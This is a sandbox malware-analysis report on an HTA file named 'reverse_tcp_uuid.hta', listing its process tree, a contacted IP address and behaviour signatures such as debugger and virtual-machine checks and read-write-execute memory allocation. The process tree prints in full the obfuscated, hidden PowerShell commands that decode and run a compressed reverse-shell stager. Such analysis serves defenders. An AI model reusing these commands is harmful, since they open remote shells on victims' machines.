Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	May 31, 2024, 10:03 a.m.	May 31, 2024, 10:16 a.m.

Size	7.3KB
Type	HTML document, ASCII text, with very long lines
MD5	`b177937631436154e4bbf6f577e127ed`
SHA256	`b59ee8a77c8d3311b14eb8850aee1e9230e1035dffe7c310529e1201bcbb74f1`
CRC32	`8A145F72`
ssdeep	`192:bn2jh1hqT24RKhkbiC5w1VyFUqzmIsMRwYXWlQ4RF6hd9d:bn2jh1hsRRROiSVyF5mH019rhd9d`
Yara	Antivirus - Contains references to security software

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\reverse_tcp_uuid.hta
840
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEARQBnAEgANgAyAFUAQwBBADcAVgBXAGIAVwAvAGkATwBCAEQAKwB2AHQATAArAGgAMgBpAEYAUgBOAEIAUwBFAGwANgB1ADIAMQBaAGEANgBSAHoAUwBBAEcAMgBoAGcAUgBRAG8AWgBkAEgASgBUAFoAegBFAGkAeABQAFQAeABDAG0AbABlAC8AdgBmAGIAeAB4AEkAeQA5ACcAJwArACcAJwA2ADIAcQA5ADUASgBhADQAbgBXAHMAVwBmAEcANAAyAGUAZQBtAGIARwBmAHgAYQA2AGcAUABGAGIAaQBsAHYATAB0AC8AVAB0AGwATgAyAHkAYwA0AEUAaABSAFMAegB3ADEAeABsAFcAbABsAEQAVQByAHoAMwB1AGwATgBEAHMAJwAnACsAJwAnADgAVQBqADQAcgA2AGgAeQB0AFYAaQBhAFAATQBJADAAWABKAHkAZgB0AEwARQBsAEkATABMAGIAZgB0AFEANABSAEsARQAxAEoAZABNAHMAbwBTAGQAVwBLADgAcgBjAHkARABVAGwAQwBEAGkANQB2AHYAeABKAFgASwBOACsAVQAwAGwAKwAxAEQAdQBPADMAbQBPADMARQBOAG0AMwBzAGgAawBRADUAUQBMAEUAbgA5AHkANgA0AGkANgBWAGIATgBXAGYARgBxAEYARABMAFgANwA2AFUASwAvAE8ARAArAHEASgAyAGUAcABkAGgAbABxAHAAbABaADUATQBLAEUAdABVADgAeABzAG8AVgA1AFgAdABGAEgAbgBpADEAVwBSAEcAMQAzAEsAZAB1AHcAbABQAHUAaQA5AHEAVQB4AHMAMQBHAGIAUgB5AG4AMgBDAGMARABzAEgAWgBQACsAawBTAEUAMwBFAHYATABjAEoAbgBuADYAeQBSAEUAWgBFAG0AOAB2AFoAVQAwAHMAeABWAFMAeQB6AEMAMQBFACsANABpAHoAMAB0AEkAbQBwAGEAcgB5AGwAdwBlAE0ARgA4AHMALwBsAFQAbgB1ADkATgBIAFcAUwB4AG8AUgBHAHEAOQBXAEoAQwBFAHIAeAB5AFMAMwBGAE8AWABwAEwAVQB1AGoAagAxAEcAUgBzAFIAZgBnAEoAewAxAH0AagBFACcAJwArACcAJwBoAG8ASABpADAAbwBGAHgATwA3ADUAawBxAGkAbABPAEcATwBzAHEAdgB3AFgATQArAHEAQQByAEEAdgBzADMAcQBxAGsANwBpAHUAQgBsAEMAMgBTAFMAaABWAEMAKwBzAEkAOQArADkAegBMAEcATgBsAHEAbABsADkAdwBOAEsAZABCAEIAYwBhAFcAQwBnAEQAZgBkADQAbQBnAC8AOABTAGQAdwB4AGUANAA4ADcAeABRAGoASABtACsAUQA4AEIAZgAxAGUAewAxAH0AcAB6AFYAVQAnACcAKwAnACcALwBLADMAcABWADYAYwBQAEoAVwBQAEIAawBBADUAKwBsAHEAeQBRAGoAbABjAFUAVAAyAGsAcgBwADAAUgA0AGwAMQBiAGQAYQBxAHgAZQBxAG8ARQBnAG0ANgA4AHsAMQB9ADUAcgBNADAAbgBuAEgAcQBMAFoAdwBzAC8AaABMACsAMABuAFAAbQA5AHIAcABSADYAbgBjADAAbQA4AFcAbABNAHoARQAyAE0ASQArAG8AVwBoAEYAVgBmAEMAZwByAHgARwBjAGsAeABxAFIAVgBpACcAJwArACcAJwBBAC8AQgBSAEwAZQA4ADIAaQBHAGMAUwBSAGcASQBzAEoATQB5AFMARwB6ACsAcABuAFUAWgBVAFAATwBrAGEARwBXAFUAZQBTAFoAQQBMAGcAVQAzAEIASwA0AGgANQA1AFUAZABuAHQAcABGAFQAeQA3ADIANABUAHkASQBBAGMAUABzAE4AWgBDADMANQBrAEMAYQBrAGsATgA2AGwAeABxAHsAMQB9ADQAWABYADYARABVAEwAbgBOAGMASgBwAFcARgBUAHUARABQAEgAVwByACcAJwArACcAJwBpAGsATQAnACcAKwAnACcAdwBJADEANQBWAFEAWABGAEsAZAAxAHMAJwAnACsAJwAnAG8ARQB6AHkAZgBsAHAALwBkADcAVwBkAE0AVQBCAGUAbgBvAGoAQwAzAHEAUAB3AGIAegAnACcAKwAnACcAOQAyADUAYgBSADYAbgBJAHMAbABjACcAJwArACcAJwBpAEMAMQBnAGMATwBXAHMAaQBFAHMAeABrADUAQgBVAGwAUwA3ADEAaQBMAEYAeABhAEYAQwBjAFgAMwA0AFIAawBEAFoAbQBEAFAASQBIAEwATgAxAEQAUQBHAEIARgBBAHUARQBJAHkAWgBnAEUAWABNADMAWgBVAGEAawA1AFIAUABTAGkARgBTAE0AUgB5AE8AUwBGAHcAMgBJADQAZwBEAEsAeAB5ADUASwBjAHsAMQB9AGoAZwBnAFgAdgBrADEAVAA0AHQAcwAyAEYASgBmAHsAMQB9AGwATwBBAHMAdQBjAG4AQgBOAHgAaABYAEYAUwBWAEMAVQAwAEUAMQBDAEcASgBjADAANgB5AC8AKwBYAEgAegB5AFYAbwA2ADEAQQA3AEkAYgBzAFEAcQBVAFcAbQB6AHsAMQB9ADIATgBrAE0AbABRAGUAaAB5AFoAQQA4AG4AVgBIAFUANAA1AEsAbwBrAEEAUgBLAHkARQBSAHcAWgBPAHkAVwBGAHIAVwAyAC8AVQBEADkAbwBsAHQAUgBHAE0AVwBTADkAbQBmAGUAOQBzAFMAZQB1ADkATgBmAHoANgA4AEIAdgBUAFoAbwAvADMALwBTAE4AYgA2AEQAegBxAHUAKwAzAFUANwBsAGgASABpAEsANgBEAHQAWABzADAAUQBLADUAMwA1AHAARgBqAFoAOQBJAFMAegBtAGwAUAB0AEcAMwBVAEgAVgBMAGQAYQBJAFcAdQBvAFYAJwAnACsAJwAnAC8ASgBlAFQAMABJAGsASABkADUANABSAGoAaABNACcAJwArACcAJwBIAFMAWgBiAHAAdABkAHoAWgBtAGwATwBsADEAMwBwADkATABXADEAbwBiAGIAYQBuAFcAdgBkAGQAUgBzAHQAaQA2AGIAKwBoAEkAUQBuACcAJwArACcAJwBJAEgAZQBFAG4AbQBEAGkASwA0AGYATABtAEQAdQBTAGgAdABHAEwAegBYADAASABqAHMAOQAnACcAKwAnACcAYQA0ADkAdQBwAHcAMwByAFoAcwBxADYAVwBzAHMASwAvAFMAbABQAG4AYwBPAFoAcQBXAG4AYQBzAHsAMQB9AGYATgAvAGcAewAxAH0AaABnADMAdgBOAC8AdQBhADYAUAB1AEoAWABYAFQAYwB5AFcAagBIAFgAagAnACcAKwAnACcAdAB1AHQASgBUAHAARgBxAEIAMgBmAFQAaQB5AEQAbgA4ACsATQBCAE4AbgBhAEIAQQBjAHIAagBvAGEAZgBtAGoAdwBLADIAdQBqAHMAdwBhAEQAawBaAGoAaQAyAGoATwBIAFEATQB0AEMANAA4AC8AWABPAFAATgB7ADEAfQBDADcAWABoADYAagBVAE4AagBPAG0AbgBRAG0AOQBYADEASwBJAFIAdgBhADkAMABkAG4AbQB0ADYAcQArAGUAUgBSADAANABsAGMAQgAyAE8AYwBHAGoAeQBVAHoAbQAzAFAATQA5ADgANABKAFoANQBhADYANgBFAE4AYQAxAFAAQgBwADIAUAA2AGMAUABaACcAJwArACcAJwBOAGUANQBmAEoASgBlAFcAcAB0AFcAbgBJAEIAdQBNAHcARgA3AFEAYgByAGkAaABEAC8AYgBNAGoAOABqADQATwBPAEIAcABBAHkAOABOAGoAZwB4AHAANAArAHsAMQB9AE8AZABjAEwAWgB5AHIASQBaADcARgArAE4ARwB4AHgATgAyAE8AQQBhAG8ANAB1AGIAagBiAFEAeABzADEAdQBvAHEALwBOAHAASgAwAEIARAAnACcAKwAnACcARQBNAGUAQgBNAGMAUQBvAHYAVABjAGYAVABhADAAKwA4AGIAZwAzAC8AVwBNAHcAOAA3AFgASgBOAGYAdQBrAG0AZQAyAGgASAB7ADEAfQA0ADEATwBWAGIAawBIAHYANgB1AHUAKwBhADUAZQAxAE4AZgB1ADUAZQBmAGoAaQA2AG0AZABCAEoAeABCACcAJwArACcAJwBOAHUAVABEADAAQwBnACsAWgBqAEcAbwB0AGwAewAnACcAKwAnACcAMQB9AGwAQgA1ADgAVwBXADMAZgB2AHkAdAA1AGsAegAwAEsAdgBkAFoASAArAGoAaABKAFEAOAB5AEEAVwB0AEEAZwBpAGsAUwAzAGUARwBMAHQAaQByADcATgBxAGQAUgBRAFYAWABnADQATABFAGsAUwBFAHcAYgBOAEYAdABwAHgAawBSAHUASQBNAGUANwBLAGgAZwBQAE4AQQBWAHIAZAB0AGcASABKAGYAagBqAHUANQBlADYAOABOAEsAcwBvAFQAJwAnACsAJwAnADQASwBWADUAegBaAFUATABKADIAYwAzAEkAQwBIAE0AdABVAGcAQwBXAG8AWABKAEEANQBFAFcATgBVAGYAbQByAG8ATwBMAFUAUgAvADAARgB0ADUAVAByADMAOQBYAG0AMgArADIAcQBpADUAcwBhAHAAcwBRAGcAQgBMAHsAMQB9AFoAdgBsAHQAcwBFAGMAOQBSAFYAVgAvAGQAMQBJAHcAUwB0AEQAUQBMAEYANwBEAGEAdgBYAHsAMQB9AEkATgB6AGwAMQBDAHsAMQB9AG8ARgBSAHUAUwA0AFUARQB6ACsAQwBjADcAVQBPAFgAMwArAG0ASgBBAFAAdQA0AEEAVwBCADEAdQBQAFIAYwB2AGkANgBBAEcAYQBCADkAUQBPADYAVQBrAHAARABOAGQANwArAFoAbAAwAFQANABPADgAbQB5AHEAMwBVAGgALwBQAE4AKwBUAFoAYgBuAHQAVgAvAHMAdgBvAGwAQQBlAGwAWABDADgAdABQAGkAagB3AHQANwBmAGUASwAzAFgAWAA2AEsAcQBRAEEANQBCADgAbwAxAEkAOQB1AEgAeABFAHMAewAxAH0ANwBIAEoAagBMADYAbwA1ADcALwAzAGQAawBJAC8AcgB5ADAAdwBjAEQATwBDAHgAbAByAGUATABmAHcAQQBnADIANQBRADQAMAB3AHMAQQBBAEEAewAwAH0AewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwBZACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
  2080
  - powershell.exe "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAEgH62UCA7VWbW/iOBD+vtL+h2iFRNBSEl6u21Za6RzSAG2hgRQoZdHJTZzEixPTxCmle/vfbxxIy9'+'62q95Ja4nWsWfG42eembGfxa6gPFbilvLt/TtlN2yc4EhRSzw1xlWllDUrz3ulNDs'+'8Uj4r6hytViaPMI0XJyftLElILLbftQ4RKE1JdMsoSdWK8rcyDUlCDi5vvxJXKN+U0l+1DuO3mO3ENm3shkQ5QLEn9y64i6VbNWfFqFDLX76UK/OD+qJ2epdhlqplZ5MKEtU8xsoV5XtFHni1WRG13KduwlPui9qUxs1GbRyn2CcDsHZP+kSE3EvLcJnn6yREZEm8vZU0sxVSyzC1E+4iz0tImparylweMF8s/lTnu9NHWSxoRGq9WJCErxyS3FOXpLUujj1GRsRfgJ{1}jE'+'hoHi0oFxO75kqilOGOsqvwXM+qArAvs3qqk7iuBlC2SShVC+sI9+9zLGNlqll9wNKdBBcaWCgDfd4mg/8Sdwxe487xQjHm+Q8Bf1e{1}pzVU'+'/K3pV6cPJWPBkA5+lqyQjlcUT2krp0R4l1bdaqxeqoEgm68{1}5rM0nnHqLZws/hL+0nPm9rpR6nc0m8WlMzE2MI+oWhFVfCgrxGckxqRVi'+'A/BRLe82iGcSRgIsJMySGz+pnUZUPOkaGWUeSZALgU3BK4h55UdntpFTy724TyIAcPsNZC35kCakkN6lxq{1}4XX6DULnNcJpWFTuDPHWr'+'ikM'+'wI15VQXFKd1s'+'oEzyflp/d7WdMUBenojC3qPwbz'+'925bR6nIslc'+'iC1gcOWsiEsxk5BUlS71iLFxaFCcX34RkDZmDPIHLN1DQGBFAuEIyZgEXM3ZUak5RPSiFSMRyOSFw2I4gDKxy5Kc{1}jggXvk1T4ts2FJf{1}lOAsucnBNxhXFSVCU0E1CGJc06y/+XHzyVo61A7IbsQqUWmz{1}2NkMlQehyZA8nVHU45KokARKyERwZOyWFrW2/UD9oltRGMWS9mfe9sSeu9Nfz68BvTZo/3/SNb6Dzqu+3U7lhHiK6DtXs0QK535pFjZ9ISzmlPtG3UHVLdaIWuoV'+'/JeT0IkHd54RjhM'+'HSZbptdzZmlOl13p9LW1obbanWvddRsti6b+hIQn'+'IHeEnmDiK4fLmDuShtGLzX0Hjs9'+'a49upw3rZsq6WssK/SlPncOZqWnas{1}fN/g{1}hg3vN/ua6PuJXXTcyWjHXj'+'tutJTpFqB2fTiyDn8+MBNnaBAcrjoafmjwK2ujswaDkZji2jOHQMtC48/XOPN{1}C7Xh6jUNjOmnQm9X1KIRva90dnmt6q+eRR04lcB2OcGjyUzm3PM984JZ5a66ENa1PBp2P6cPZ'+'Ne5fJJeWptWnIBuMwF7QbrihD/bMj8j4OOBpAy8Njgxp4+{1}OdcLZyrIZ7F+NGxxN2OAao4ubjbQxs1uoq/NpJ0BD'+'EMeBMcQovTcfTa0+8bg3/WMw87XJNfukme2hH{1}41OVbkHv6uu+a5e1Nfu5efji6mdBJxB'+'NuTD0Cg+ZjGotl{'+'1}lB58WW3fvyt5kz0KvdZH+jhJQ8yAWtAgikS3eGLtir7NqdRQVXg4LEkSEwbNFtpxkRuIMe7KhgPNAVrdtgHJfjju5e68NKsoT'+'4KV5zZULJ2c3ICHMtUgCWoXJA5EWNUfmroOLUR/0Ft5Tr39Xm2+2qi5sapsQgBL{1}ZvltsEc9RVV/d1IwStDQLF7DavX{1}INzl1C{1}oFRuS4UEz+Cc7UOX3+mJAPu4AWB1uPRcvi6AGaB9QO6UkpDNd7+Zl0T4O8myq3Uh/PN+TZbntV/svolAelXC8tPijwt7feK3XX6KqQA5B8o1I9uHxEs{1}7HJjL6o57/3dkI/ry0wcDOCxlreLfwAg25Q40wsAAA{0}{0}')-f'=','Y')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
    2220

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
1.14.247.162	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (12 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 31, 2024, 10:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 10:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 10:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 10:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 31, 2024, 10:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 10:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 10:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 10:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 10:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 10:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 31, 2024, 10:03 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 10:03 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 31, 2024, 10:03 a.m.			0	0
IsDebuggerPresent May 31, 2024, 10:03 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (50 out of 80 events)

Time & API	Arguments	Status	Return
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c4870 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c4e30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c4e30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c4e30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c45b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c45b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c45b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c45b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c45b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c45b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c4e30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c4e30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c4e30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c50b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c50b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c50b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c4a30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c50b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c50b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c50b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c50b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c50b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c50b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c50b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c52b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c52b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c52b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c52b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c52b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c52b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c52b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c52b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c52b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c52b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c52b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c52b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c52b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c52b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c4d30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c4d30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cc318 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cc458 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cc458 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cc458 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cbbd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cbbd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cbbd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cbbd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cbbd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:03 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cbbd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 31, 2024, 10:03 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 278 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 2162688 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02730000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02900000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
